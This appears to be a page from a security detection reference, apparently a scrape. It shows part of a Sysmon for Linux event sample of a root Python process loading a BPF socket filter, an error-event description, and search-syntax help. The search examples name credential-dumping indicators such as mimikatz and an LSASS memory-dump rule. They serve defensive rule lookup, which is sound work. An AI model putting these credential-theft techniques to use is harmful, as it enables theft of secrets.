    "time_created": "2026-06-21T17:30:03.188625000+00:00",
    "event_record_id": 2445256,
    "correlation": {},
    "execution": {
      "process_id": 313895,
      "thread_id": 313895
    },
    "channel": "Linux-Sysmon/Operational",
    "computer": "JD-debian-12-workstation",
    "security": {
      "user_id": "0"
    }
  },
  "event_data": {
    "RuleName": "-",
    "UtcTime": "2026-06-21 17:30:03.176",
    "ProcessGuid": "{370e939b-1f9b-6a38-8912-6d0000000000}",
    "ProcessId": "314001",
    "Image": "/usr/bin/python3.11",
    "User": "root",
    "BpfCommand": "BPF_PROG_LOAD",
    "BpfProgramType": "SOCKET_FILTER",
    "BpfProgramId": "3",
    "BpfProgramName": "dwcap1782062994"
  },
  "message": ""
}

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 255: Error

Provider: Sysmon for Linux

Description

Sysmon for Linux encountered an error. Logged when the driver or service encounters an unexpected condition.

Fields #

Name	Description
`UtcTime`	Time in UTC when the error occurred
`ID`	Event ID that encountered the error
`Description`	Description of the error

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

`j` / `k`	Scroll down / up
`d` / `u`	Half-page down / up
`gg` / `G`	Top / bottom
`h` / `l`	History back / forward
`f`	Follow link (`Shift` = new tab)
`/`	Focus search
`?`	Toggle this help
`↑` / `↓`	Navigate search results
`Enter`	Open highlighted result
`Esc`	Close results / dialog

`type:`	`events` / `rules` / `providers`
`vendor:`	`sigma` / `elastic` / `splunk` / `kusto` / `chronicle` (vendor name alone also works: `sigma:`, `kql:`, `secops:`…)
`tactic:`	TA-id, slug, or name: `credential_access`, `TA0006`
`technique:`	technique or sub-technique ID: `T1003`, `T1003.001` (alias `tech:`)
`severity:`	`critical` / `high` / `medium` / `low` / `informational` (alias `sev:`)
`risk_score`	Numeric comparison on the Elastic risk score (0 to 100): `risk_score>50`, `risk_score<=20`, `risk_score=99` (alias `risk`; Elastic rules only)
`stages:`	Rules with exactly N pipeline stages
`correlation:`	`single_event` / `sequence` / `alternatives` / `alternatives_cross_log` / `all_required` / `correlated`
`with:`	Co-occurrence event-id; stacks (`with:4624 with:4769`) to require all, while a comma list in one occurrence (`with:4624,4769`) is an either-or group. Implies multi-event
`like:`	Structural neighbors of a rule slug (equivalents + subsumption stricter / broader): `like:comsvcs_lsass_memory_dump-splunk-sysmon`
`groupby:`	Entity-grouping substring match against `group_by_keys`: `groupby:user`, `groupby:host`
`uses:`	Rules whose predicate tree touches the field (any kind, any value): `uses:CommandLine`
`excludes:`	Rules with top-level `not()` clauses on the field (FP whitelists): `excludes:ParentImage`
`field:` / `value:`	Predicate search; narrows rule cards to those with a matching leaf and drives the indicator tier. Unquoted = substring, wildcards allowed (`value:mimikatz`)
`indicator:`	Shorthand for `field:F value:V`: `indicator:Image=*\powershell.exe`
`kind:`	Filter by predicate kind. Narrows rule cards to those carrying a matching predicate leaf (`vendor:elastic kind:cidr_match`) and drives the indicator tier: `contains` / `starts_with` / `ends_with` / `regex` / `cidr` / `eq` / `in` … (operator aliases `op:`/`match:`)
`has:` / `no:`	`sample`, `field`, `notes`, `refs`, `trace`, `thirdparty`, `rule`, `pattern`, `timewindow`, `threshold`, `newterms`, `sigma`/`elastic`/`splunk`/`kusto`/`chronicle`
`-op:val`	Exclude matches; works on most operators but not `type:`/`like:`/`has:`/`no:` (use `no:<flag>` to exclude a rule flag): `tactic:execution -vendor:splunk`. Standalone `-kind:`/`-field:`/`-value:` drop every rule carrying a matching predicate leaf (`type:rules -kind:is_null`)
`field:"…"` / `value:"…"`	Quoted value = anchored exact match (also allows spaces): `value:"net user"`
`a,b`	Comma = OR inside one operator (`vendor:sigma,elastic`, `severity:high,critical`); repeating a facet merges the same way. `field:`/`value:` never split (literal commas)
`vendors:` / `stage:`	Singular and plural spellings fold to the canonical operator and value: `tactics:` = `tactic:`, `type:event` = `type:events`, `correlation:sequences` = `correlation:sequence`, `has:thresholds` = `has:threshold`
`"quoted phrase"`	Exact-match a multi-word phrase (free text)